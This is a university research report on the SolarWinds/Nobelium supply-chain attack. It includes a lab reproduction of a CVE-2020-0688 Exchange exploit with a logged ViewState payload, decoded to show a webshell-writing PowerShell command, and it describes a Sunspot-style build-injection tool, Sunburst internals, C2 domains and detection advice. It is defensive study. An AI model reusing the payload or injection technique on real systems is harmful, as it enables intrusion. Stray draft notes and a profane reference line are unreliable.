--- tags: CCF, University --- <center> # Nobelium APT. SolarWinds Incident CCF Research Project ### Authors: Vladimir Shelkovnikov v.shelkovnikov@innopolis.university Ilya Radomsky r.ilia@innopolis.university Alisher Arystay a.arystay@innopolis.university Naghmeh Mohammadi n.mohammadifar@innopolis.university ## ABSTRACT </center> The purpose of this study is to study the largest cyber incident of 2020-2021. So during the project, the tactics used by APT in the attack on SolarWinds will be investigated. By modeling the actions of an attacker, we will get enough data to analyze such attacks and develop a solution to prevent them. ## I. INTRODUCTION The SolarWinds hack has become one of the most massive supply chain attacks in history. In December 2020, it became known that unknown attackers attacked the company and infected its Orion platform with malware [1]. According to official data, among 300000 SolarWinds customers, only 33000 used Orion, and at the beginning of the year, it was reported that the infected version of the platform was installed in about 18,000 customers [2, 3]. Because of this incident, such giants as Microsoft, Cisco, FireEye, as well as many US government agencies, including the State Department, the Department of Justice, and the National Nuclear Safety Administration, were affected [3]. Thus, the possibilities of attacks on supply chains are often not given due attention, although such cyberattacks can cause catastrophic damage if they remain unrecognized for long enough. Supply chain attacks target vendors and suppliers rather than a specific business, making them difficult to detect and prevent. In this study, we will take a detailed look at an attack on the supply chain using the example of the SolarWinds incident. ## II. RESEARCH GOALS For this research, we decided to formulate the following tasks: 1) Based on the SolarWinds incident, consider the tactics used by APT. 2) Simulate the actions of attackers to collect data. 3) Identify the signs that will help detect the fact of an attack. ## III. RELATED WORKS Most of the work related to this topic concerns only malware that was used during the incident [1, 3, 6]. There is a countermeasure [4, 5] for the malware used, while a very small amount of work concerns the entire path of the attacker inside the network. Therefore, for your research, we would like to simulate the actions of an attacker to see if an incident can be prevented in the early stages. ## IV. THE SOLARWINDS ATTACK The SolalWinds attack becomes the most serious cyber incident, that results into a supply chain attack (SCA). It means that attackers inject malicious code to the SolarWinds apps, which provide them access to the systems of SolarWinds customers. According to the official data, 18000 were affected by this [7]. A similar attack is a Log4j vulnerability, which is also one of the most serious cyber security problems at this time. According to Google statistics [8], more than 8% of all packages on Maven Central have at least one version that is impacted by this vulnerability. So what’s make Solarwinds special? The main reason for this is the impact of this attack: 1. Since SolarWinds has many high-profile clients, this attack affects such companies as Microsoft, Cisco, Intel, and even the US government - Pentagon, the Department of Homeland Security, the National Nuclear Security Administration, and the Treasury, etc [9]. 2. The technical and stealthy nature of the attack allowed it to remain undetected for many months. So even now some of the companies may not know if they were hacked. 3. As a result, enterprise systems and networks need broad changes in their security. Now let's go deep into the SolarWinds hack. To do this, we will use the kill chain [10] (Figure 1) and the timeline of the attack (Figure 2). <center>  Figure 1 - Kill chain  Figure 2 - Attack timeline </center> The attack can be divided into 4 stages [11], for each one of them we will look at the attacker's actions and see if there were indicators that can prevent this incident. ## V. Stage 1 - Initial Infiltration There is still not much information about how does it start. But two main versions are remote code execution (RCE) vulnerabilities in Microsoft Exchange or VMWare. But most likely that it was an MS email server, cause after the SolarWinds attack there was an attack on Microsoft, which was marked as related to Nobelium APT [12]. It exploited CVE-2020-0688 vulnerability, which was patched a short time after this [13]. So now let’s implement this step of attack. To do this, we used the GNS3 environment and created a simple network topology as shown in Figure 3.  Figure 3 - Network topology Figure 3 - Network topology Here we have three windows VMs. DC-01 (10.1.1.22) configured as Active Directory Domain Controller and DNS server. 10.1.1.52 is an MS Exchange email server (dc-01). It has a connected client machine - test with IP address 10.1.1.93. During the SolarWinds attack credentials for one email account were published on GitHub [14]. So for our example, we consider that credentials for the Client email account were also exposed. Login - test, password - Sl4v3s1. The next step is to exploit the CVE-2020-0688 vulnerability. For that, we used script [15]. Now let me briefly explain how does it work: This vulnerability is related to the Exchange Control Panel (ECP) component. The cause of it is the same validationKey and decryptionKey values in web.config. These keys are used to provide security for ViewState. This is server-side data that .NET apps store on the client-side. To provide this data back to the server clients used the special request parameter - __VIEWSTATE. The attacker can access the data using the browser, which then can trick the server into deserializing malicious data. To test it, after configuring the Windows machines, I used the exploit as shown in Figure 4.  Figure 4 - Exploit Here we used exposed credentials for the client to write the output from the Powershell command whoami to the file whoami.txt. Let’s check if it works (Figure 5).  Figure 5 - whoami.txt file According to the Mandian report [1], attackers used scripts to avoid detection. So to test the possible detection via traffic analysis, we used the script [16] to create a connection between the vulnerable email server and attacker as shown in Figure 6.  Figure 6 - webshell Also, we looked at the traffic (Figure 7).  Figure 7 - Traffic There is nothing suspicious here, but at this part, we performed actions from Figure 5. We can see suspicious actions via IIS logs as shown below, but still, we can easily delete them. ``` 2022-03-06 04:56:32 10.1.1.52 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=/wEyvgcAAQAAAP////8BAAAAAAAAAAwCAAAAG01pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvcgUBAAAAQk1pY3Jvc29mdC5WaXN1YWxTdHVkaW8uVGV4dC5Gb3JtYXR0aW5nLlRleHRGb3JtYXR0aW5nUnVuUHJvcGVydGllcwEAAAAPRm9yZWdyb3VuZEJydXNoAQIAAAAGAwAAAKMGPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgeG1sbnM6YT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIj48T2JqZWN0RGF0YVByb3ZpZGVyLk9iamVjdEluc3RhbmNlPjxhOlByb2Nlc3M%2BPGE6UHJvY2Vzcy5TdGFydEluZm8%2BPGE6UHJvY2Vzc1N0YXJ0SW5mbyBBcmd1bWVudHM9Ii9jIHBvd2Vyc2hlbGwgLW5vcCAtZXAgYnlwYXNzIC1jICZxdW90O1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJ1BDVkFjR0ZuWlNCc1lXNW5kV0ZuWlQwaVF5TWlKVDQ4SlVBZ2FXMXdiM0owSUU1aGJXVnpjR0ZqWlQwaVUzbHpkR1Z0TGtsUElpVStQQ1ZBSUdsdGNHOXlkQ0JPWVcxbGMzQmhZMlU5SWxONWMzUmxiUzVZYld3aUpUNDhKVUFnYVcxd2IzSjBJRTVoYldWemNHRmpaVDBpVTNsemRHVnRMbGh0YkM1WWMyd2lKVDQ4SlhOMGNtbHVaeUI0Yld3OVFDSThQM2h0YkNCMlpYSnphVzl1UFNJaU1TNHdJaUkvUGc9PScpKSZxdW90OyAmZ3Q7Jmd0OyAmcXVvdDslZXhjaGFuZ2VpbnN0YWxscGF0aCVcXENsaWVudEFjY2Vzc1xcZWNwXFxIeWJyaWRMb2dvdXQuYXNweCZxdW90OyIgRmlsZU5hbWU9ImNtZCIvPjwvYTpQcm9jZXNzLlN0YXJ0SW5mbz48L2E6UHJvY2Vzcz48L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT48L09iamVjdERhdGFQcm92aWRlcj4LookYYGQfs4T9cEBz0zG2l8lQOs0%3D&CorrelationID=<empty>;&cafeReqId=f88a673b-353c-48e3-b141-bcd41af5a8f6; 443 test 10.1.1.212 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko) - 500 0 0 3882 ``` The IP address of the attacker is 10.1.1.212. __VIEWSTATE= is exploit part. To decode it, we used URL decode and from base64 in CyberChef [17]. The result is shown below: ``` ÿ
2¾
ÿÿÿÿ
Microsoft.PowerShell.Editor
BMicrosoft.VisualStudio.Text.Formatting.TextFormattingRunProperties
ForegroundBrush
£<ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:a="clr-namespace:System.Diagnostics;assembly=System"><ObjectDataProvider.ObjectInstance><a:Process><a:Process.StartInfo><a:ProcessStartInfo Arguments="/c powershell -nop -ep bypass -c &quot;[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('PCVAcGFnZSBsYW5ndWFnZT0iQyMiJT48JUAgaW1wb3J0IE5hbWVzcGFjZT0iU3lzdGVtLklPIiU+PCVAIGltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5YbWwiJT48JUAgaW1wb3J0IE5hbWVzcGFjZT0iU3lzdGVtLlhtbC5Yc2wiJT48JXN0cmluZyB4bWw9QCI8P3htbCB2ZXJzaW9uPSIiMS4wIiI/Pg=='))&quot; &gt;&gt; &quot;%exchangeinstallpath%\\ClientAccess\\ecp\\HybridLogout.aspx&quot;" FileName="cmd"/></a:Process.StartInfo></a:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider>¢‰`d³„ýp@sÓ1¶—ÉP:Í ``` This is one of the commands to establish the webshell to the email server. Thus, we cannot get useful information for investigating incidents from traffic, especially considering the fact that employees were working remotely at that time. For the forensic investigation of this activity, we can use log files as we already showed and memory to investigate processes. So when we launch the calculator app (calc.exe process) first it starts the IIS worker process (w3wp.exe ), which will spawn a child process calc.exe as shown in Figure 8.  Figure 8 – Executing the malicious process After that, attackers started to leak sensitive data from enterprise emails. At this stage, they need to spread across the SolarWinds network but they are limited by multi-factor authorization. So to act as a regular user for enterprise systems they performed an attack called Golden SAML Attack (Figure 9).  Figure 9 - Golden SAML Attack Here they are used a compromised SAML certificate to sign the created tokens. It allows acting as a legit user. But this SAML certificate compromisation could be stopped with several stages by analyzing id codes of the ADFS server: Legitimate logging to the service will give to the user such events log as ‘Event id 1202’, ‘Event id 1200’ for the ADFS server, and ‘Event id 4769’ for the Domain controller. If such an entrance technique as Golden SAML is used there is no presence of such log messages. If one of those messages are missing it is a signal to act Exporting certificates from the ADFS server is not a common thing to do, so additionally it is a good thing to monitor such logging is’s like 4103 and 4104 (Export-PfxCertificate or certutil-exportPFX). Such id as 18 is signaling to the Certificate extraction with ADFSdump Architecture change can be performed such as Only Cloud-based Identity provider and Utilizing multiple instances of ADFS server for the best possible security The solution called QRadar by IBM can be used. Some rules for the Golden SAML attack are written to create a defense against it. Those rules are based on the N1 step of this list, so to Event id 1201 and 1200 At this point, we can interpret the initial state as shown in Figure 10.  Figure 10 - Access to network So during the first stage, attackers got access to the enterprise network, started to leak sensitive data from it, and were able to modify authentication options. How can we prevent an attack at this stage? Many of these actions can be seen in log files. So universal method to prevent such actions is to use a monitoring system, that will collect data from sensitive parts of the system and send them to the anomaly-based IDS/IPS system. A good solution is to conduct a vulnerability scan for publicly available services. Also, it is required to install patches for vulnerable services. Follow the principle of least privilege. ## VI. Stage 2 - Access to developers On the hearing on SolarWinds hacking [18], information about spear phishing companies against developers was revealed. Attackers used information gained from the email server to send weaponized emails to developers. This is not the only method used by the attacker. This is also one of the key moments in attackers' success - they used a very wide toolkit for the attack. They used an HTML file, which when it was opened triggered JS to wrote an ISO file to disc. After it was mounted by a victim, DLL executed Cobalt Strike Beacon on the system (Figure 11) [19].  Figure 11 - Spear-phishing performed by Nobelium This is just one example of used tactics. This step of the attack is shown in Figure 12.  Figure 12 - Second stage During this stage, attackers got access to the development environment for SolarWinds products. After that, they started to test if they can include malicious code in the app code. What can be done here? General information: Managing phishing emails can be different. Your users should know about the existence of phishing emails and have the knowledge to work with them, to evade risks, not open them, and not open attachments of those emails. Link redirection can be turned off if it is possible for your company. Of course, ordinary employees should redirect this malicious mail to the cybersecurity department. Technical staff should keep up do date all systems in the network. Browsers have the ability for enabling protection from phishing domains, so this solution should be installed or enabled SPF, DKIM, DMARC, DANE protocols should be enabled on your email server Of course, there are plenty of additional solutions to make your environment more secure, in the case of Microsoft exchange - Anti-phishing protection in Microsoft 365 can be enabled Good practice to make regulations on how to respond to emails, domains, and other things that can be part of the phishing attack. Of course, as a part of good practice regulations, you shouldn’t keep your password weak. Concrete information: In the SolarWind case can be proposed several solutions, which may be a key way to avoid successful phishing attacks. Let’s start with the methods provided by the Solar Wind itself, Security Event Manager [20]: 1. Checking file and folder integrity is useful if it is configured correctly and properly. Creation, deletion, and suspicious changes in the files, or folder can be monitored, and be triggered to the notification of the cybersecurity team member. 2. Securing user accounts is important, but accounts with sensitive information have to be monitored especially carefully. Shifts in account usage can be monitored, as well as a suspicious activity like changing permissions on files\folders. It is also an option of SolarWinds solution. 3. Network monitoring is an important part of the defenses of your company. In the case of solar wind breach network activity also could be monitored with the product of the injured company. Notification of the suspicious Network traffic can be enabled. 4. Because Microsoft Exchange email server was implemented such a solution as Anti-phishing protection in Microsoft 365 can be used to protect users from phishing emails. 5. A list of the possible solutions can be expanded additionally with Barracuda networks, Mimecast, etc. ## VII. Stage 3 - Code injection Now, let’s see how malicious code was injected into the SolarWinds application. This part of the attack was performed by Sunspot malware on developers' PCs [21]. It was granted with SeDebugPrivilege which allowed it to read the memory. It used this privilege to listen for the MSBuild.exe process. When the compiler going to build the SolarWinds.Orion.Core.BusinessLayer.dll, malware pause compiler and inject malicious data into it. The compiler builds the application and signs the code, which makes it a legit part of it. Now let’s look at the practical part of it. For that, we wrote my version of it in the Go language [22]. It listens for a process that uses the go compiler (Figure 13).  Figure 13 - Finding process that uses go compiler Then it waits till it uses syscall (openat) to open the main.go file as shown in Figure 14 and interrupt compiler process.  Figure 14 - Wait till openat syscall with main.go After that, it injects malicious code into the application code (Figure 14).  Figure 15 - Inject the code During this process, it saves the original file and restores it after the building stage. To test it we created the Hello world program on the go as shown in Figure 15.  Figure 16 - Hello world app Then we run the malware and started the build for the hello app. Figure 17 shows the output for malware.  Figure 17 - output for malware it detected the process with PID 2520 and wait till it opened the main.go file. At 17:58:47 it patched the original code. It set the isPatched flag to true, so it does not execute it multiple times. Also if during the patch errors will come up it will hide it. At 17:58:56 it restores the file to its original state. So for the main.go file nothing is changed but if we run compiled application it has a second string (Figure 18).  Figure 18 - No changes for main.go What can we do to avoid this? We can set the IMA policy to tcb, which allows only authorized executables to be run on the device. After that, we can use the log files to compare with the hash of the input files. Then, we can verify the log by comparing the aggregation of all IMA checksums with the value in the PCR register. Now let's look at forensic side of this application. Now let's take a look at the forensic part of the application. Since my application does not perform many actions, it has left a minimal number of artifacts. What can be noticed are manipulations with other processes and manipulations with data as can be seen in Figures 19 and 20.  Figure 19 - proccess manipulation  Figure 20 - data manipulation Also, the analysis of the sandbox gives us fairly accurate information on the operation of the program as shown in Figure 21.  Figure 21 – Result of sandbox analysis For some reason it shows that it attempted to delay the analysis. It looks like the reason is in the waiting process. ## VIII. Stage 4 - Infiltration of Endpoint users The Orion Platform has inserted an updated malicious code on February 20, 2020. After the update was available for users to download, from March to April mostly people installed it. By the report of SolarWinds, around 18000 of their clients became potential victims of this malware. The main thing was that it can not be detected at this stage due to the package being signed by SolarWinds. This became the main reason why Sunburst remained undetected for a long time. The malware can be divided into several main steps: waiting, connection to C2 server, evasion and disabling of security measurements and security processes, performing C2 activities, accessing secrets, and exfiltrating them. First of all, before doing anything, the malware stays inactive for 12-14 days. After a certain waiting period was finished, it finally sends its first ping to the C2 server. This method was used to evade network layer detection. During the first connection, the malware sends trivial information about the host: IP address, username, OS version, etc. This data is used to know whether this device can be inspected and to avoid repetitive infection. The malware includes different evasion techniques and conditions to be initialized like if the target machine has particular undesirable drivers and processes, it will abort its execution. Moreover, malware will try to change the host’s registry keys for disabling some security processes. Then C2 activities are performed. They make use of the SolarWinds protocol to mask their malicious traffic for preventing the triggering of alerts. There are different activities available: idle, exit, reboot, delete, write, etc. These operations are for manipulating the target computer. Finally, the last steps are accessing and taking out secrets - possibly the most important part of any information source in this case. To access them, Sunburst was using PowerShell scripts that were created by remote task creation. Additionally, the malware can use CobaltStrike for passing payloads. After downloading CobaltStrike from a C2, it can move to CobaltStrike Beacon to continue its remote control operations (Figure 22). <center>  Figure 22 - Active stage of backdoor </center> After accessing the target system, sensitive data like secrets are exfiltrated via PowerShell commands for sending emails or sending compressed files via HTTP requests. Now let’s have a more detailed look at Sunburst. **Sunburst backdoor:** The SUNBURST backdoor is not yet fully understood. Spanning almost 3500 lines of code, “obfuscated” with casual naming, trying to evade shallow review, it has many subtleties yet to uncover. We were able to find the decompiled version of the backdoor that we inserted inside the solarwinds dll. I will go through the code parts and explain every part then we will run a modified code of this backdoor. The backdoor start its work from "SolarWinds.Orion.Core.BusinessLayer/BusinessLayer/BackgroundInventory/InventoryManager.cs" file. Inside this file it put the entry in a function named "RefreshInternal". <center>  Figure 18: RefreshInternal method </center> In this function, they will simply create a new thread and start Initialize method from there without any conflict to the current job. Then the program will jump into the Initialize method which is in "OrionImprovementBusinessLayer" class. <center>  Figure 19: Initialize method </center> In line 114, it will check if the process which is calling this method is 99 or not. If yes, it will run only if it is morethan 12 days (12-14) after first arriving or an update. Afterwards it confirms it is the only instance of the backdoor currently running on before reading SolarWinds.Orion.Core.BusinessLayer.dll.config from disk and retrieving the XML field appSettings. "named pipe" is the synchronization mechanism used here. It will check the status and if it was any number other than 3 (OrionImprovementBusinessLayer.ReportStatus.Truncate)[23] The next step will take us to the most import parts of this backdoor which are "Update" and "UpdateNotification" methods. These functions have different part to be explained. <center>  Figure 20: Update function - part1  Figure 21: UpdateNotification method </center> 1. Process Analyzation[23]: As you can see in figure 20, line 194 and also in UpdateNotification method,a method named "TrackProcesses" is calling that its job is to find process, service, and driver names of the victim's machine and check it they are in black-list or not (figure 22). These methods will return true if a blacklisted process/service is found, causing the malware to break out of the Update() loop. These methods basically compute the hash of the process/service and check with the hardcoded ones. The interesting part is that, SearchServices will manually disable the blacklist services by writing into their registry keys. Calling setManualMode method (Figure 23) and modifying the registerkey values (figure 24). <center>  Figure 22: TrackProcesses method  Figure 23: Search services method  Figure 24: SetManualMode method </center> "SearchConfigurations" is the last method of TrackProcesses that we are diving through. This method will identify blacklisted drivers through the WMI query – Select * From Win32_SystemDriver, which is obfuscated in the method (figure 25) as C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==. The file name is obtained for each driver, and if this driver is found in the blacklist the backdoor will not fully start (Update will terminate). One example for blacklisted drivers is SentinelMonitor.sys that is hardcoded in the blacklist, meaning that the malware will not fully execute its payload on endpoints protected by SentinelOne so long as this is loaded. <center>  Figure 25: SearchConfigurations method </center> 2. Network Analysation[25]: If this blacklist check is passed, only then is the backdoor code initiated. The first interesting action the backdoor code takes is to call out to C2 to receive instructions/commands that will be parsed and passed to the job engine. - Stage 0: If you look through figure 21, a method with name of "CheckServerConnection" is calling with "api.solarwinds.com" as input. Inside this method (figure 26), backdoor will examin if the ip addresses are local, loopback, inside the network, etc. And if not, will go to the second stage. - Stage 1: Backdoor will create the hostname appended with one of the following 4 suffixes: - .appsync-api.eu-west-1.avsvmcloud.com - .appsync-api.us-west-2.avsvmcloud.com - .appsync-api.us-east-1.avsvmcloud.com - .appsync-api.us-east-2.avsvmcloud.com Then, according to the classification of returned IP of the created subdomain, the malware will choose what to do. It will stop working if the ip address would be local, ... (ATM type) and so on to prevent revealing its existence. You can see the classification is figure 27. <center>  Figure 26: CheckServerConnection  Figure 27: IP classification </center> Backdoor will send encoded DNS requests containing information about victim; if it is interesting enough for attacker, the DNS response includes a CNAME record pointing to a second level C&C server[26]. <center>  Figure 28: CNAMEs [27] </center> At the end, some commands can be sent to the backdoor: <center>  Figure 29: List of commands </center> We could find a simple decompiled file for the backdoor and bypass all of the security parts that the malware itself was considering during its execution. Here we are presenting some of the steps it takes to exexute: <center>  Figure 30: Not solarwinds.bussiness process is calling  Figure 31 </center> :::info Now let's have a look at steps of attack. **Put the picture of all steps, explain it briefly** ### Prefered way, but still put some main scheme **Put some text with the content like next part of report is looking at each step of attack. And then devide it to the part look into each one of them, create countemeasures** ::: With attackers having first gained access to the SolarWinds systems in September 2019 and the attack not being publicly discovered or reported until December 2020, attackers may well have had 14 or more months of unfettered access. ## IX. Stage 5 - Infiltration of Endpoint users After the stage of the sunburst, the backdoor is finished with all of the checkings of the environment Teardrop [28] dropper is downloaded by the sunburst. In this stage, we will cover this Teardrop trojan malware. Teardrop is a loader, such type of malware is used in order to work with another payload to establish another malware. On the picture below you can see the parameters of the portable executable from the PEStudio. The main thing to notice is that is a dynamic library with the 64-bit format, with the MZ signature, popolare signature of the malware <center>  Figure 30 - Teardrop dll file </center> Microsoft stated that in case of a Solarwinds incident, the dropper uses file "gracious_truth.jpg" or its first 64-bytes in particular in order to extract payload with "Cobalt Strike Beacon" in it. the file name, of course, is different from one case to another, according to the report.[29] As you can see from the joe sandbox report Teardrop is downloading several additional ddl's on the workstation <center>  Figure 31 - joesandbox analysis </center> From the x64dbg analysis it is visible that teardrop is trying to access some picture qword memory block with specific size, and the loa commands means to load this chunk of memory <center>  Figure 32 - x64dbg disassembling </center> Executed by the shellcode on the workstation "Cobalt Strike Beacon" is a framework for post-exploitation or exploitation and it is used for strengthening and controlling the target network. The main clues here is similar to the previous one, MZ signature, and others <center>  Figure 33 - Cabaltstrike dll file </center> It was used for creating an encrypted network tunnel and giving remote access to the attacker, additionally the "Cobalt Strike Beacon" allows the user to use other features like keylogging, screenshot taking, and vulnerability explosion. On the picture below (from joe sandbox) you can see that Cobalt Strike Beacon is trying to communicate to the malicious IP address. <center>  Figure 34 - joesandbox graph analysis </center> we can see from the PEStudio analysis that this call to the IP was called by this malicious beacon backdoor. Ip is different because the sample of the Cobalt Strike Beacon is from the different workstations <center>  Figure 35 - Analysis of the envoked actions </center> What should be done if you want to detect Teardrop or avoid being exploited? Of course, you should follow every piece of advice for the best security in your environment, but additionally, there are YARA rules for the detection of the Teardrop malware. Those rules are based on the signatures of the malware like `65 23 FB 7F 20 AA EB 0C B8 16 F6 BC 2F 4D D4 C4 39 97 C7 23 9F 3E 5C DE` and others signatures. Additionally, your defense mechanism should count on the weird behavior of the system, like picture entering, for example. At this stage, it is possible for the APT to get any information they are interested in. ## SUMMARIZATION During the project we investigated the SolarWinds incident. A lot of information about it still does not avaidable publicly but even with information that we can get we tried to repeat attackers actions. This attack can be described as very technical and stealthy. Even with our simplified version of this attack we get a little amount of evidence. While actual attacker successfully get rid of the malware trace. So with attackers having first gained access to the SolarWinds systems in September 2019 and the attack not being publicly discovered or reported until December 2020, attackers may well have had 14 or more months of unfettered access. In addition, the number of such attacks continues to grow in recent times, and although SolarWinds remains the largest of them, building protection against this type of attack will require a lot of resources.Therefore, at the moment, such incidents should be carefully studied to identify effective solutions to SCA problems ## REFERENCE [1] Mandian. Sunburst research. https://www.mandiant.com/resources/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor [2] White House Statement. https://www.whitehouse.gov/briefing-room/statements-releases/2021/04/15/fact-sheet-imposing-costs-for-harmful-foreign-activities-by-the-russian-government/ [3] SolarWinds attack. https://www.securitylab.ru/news/529849.php [4] Sunburst. Signature table. https://github.com/mandiant/sunburst_countermeasures/blob [5] FireEye SunBurst Countermeasures. https://github.com/mandiant/sunburst_countermeasures [6] Quick lookup files for SUNBURST Backdoor. https://github.com/rkovar/sunburstlookups [7] SEC. https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000162828020017451/swi-20201214.htm [8] Google. Understanding the Impact of Apache Log4j Vulnerability https://security.googleblog.com/2021/12/understanding-impact-of-apache-log4j.html [9] SolarWinds hack explained: Everything you need to know https://whatis.techtarget.com/feature/SolarWinds-hack-explained-Everything-you-need-to-know [10] Varois. What is The Cyber Kill Chain and How to Use it Effectively https://www.varonis.com/blog/cyber-kill-chain [11] Virsec Blog: Analyzing the SolarWinds Kill Chain https://industrial-software.com/community/news/virsec-blog-analyzing-the-solarwinds-kill-chain/ [12] MSTIC. NOBELIUM https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/ [13] CVE-2020-0688 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-0688 [14] ‘solarwinds123’ password https://www.itpro.co.uk/security/cyber-attacks/358738/intern-blamed-for-weak-password-that-may-have-sparked-solarwinds [15] CVE-2020-0688 exploit https://github.com/MrTiz/CVE-2020-0688 [16] CVE-2020-0688 webshell exploit https://github.com/w4fz5uck5/cve-2020-0688-webshell-upload-technique [17] CyberChef https://gchq.github.io/CyberChef/ [18] Senate Intelligence Hearing on SolarWinds Hacking https://www.c-span.org/video/?509234-1/senate-intelligence-hearing-solarwinds-hacking [19] Email attack by Nobelium APT https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/ [20] Security Event Manager https://www.solarwinds.com/security-event-manager/use-cases/spear-phishing-attack [21] SUNSPOT analisys https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/ [22] Sunspot on go https://github.com/MrRahmat/sunspot-go [23] SolarWinds SUNBURST Backdoor: Inside the APT Campaign https://www.sentinelone.com/labs/solarwinds-sunburst-backdoor-inside-the-apt-campaign/ [24] SUNBURST Backdoor explain https://www.mandiant.com/resources/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor [25] SUNBURST: Attack Flow, C2 Protocol, and Prevention https://www.cynet.com/attack-techniques-hands-on/sunburst-backdoor-c2-communication-protocol/ [26] Sunburst: connecting the dots in the DNS requests https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/ [27] sunburst_countermeasures https://github.com/mandiant/sunburst_countermeasures/blob/main/indicator_release/Indicator_Release_NBIs.csv [28] Analysis reports https://www.cisa.gov/uscert/ncas/analysis-reports/ar21-039b [29] microsoft deep dive into the solorigate second stagehttps://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ [69] KEEP FUCKING WORKING YOU LITTLE CUNT!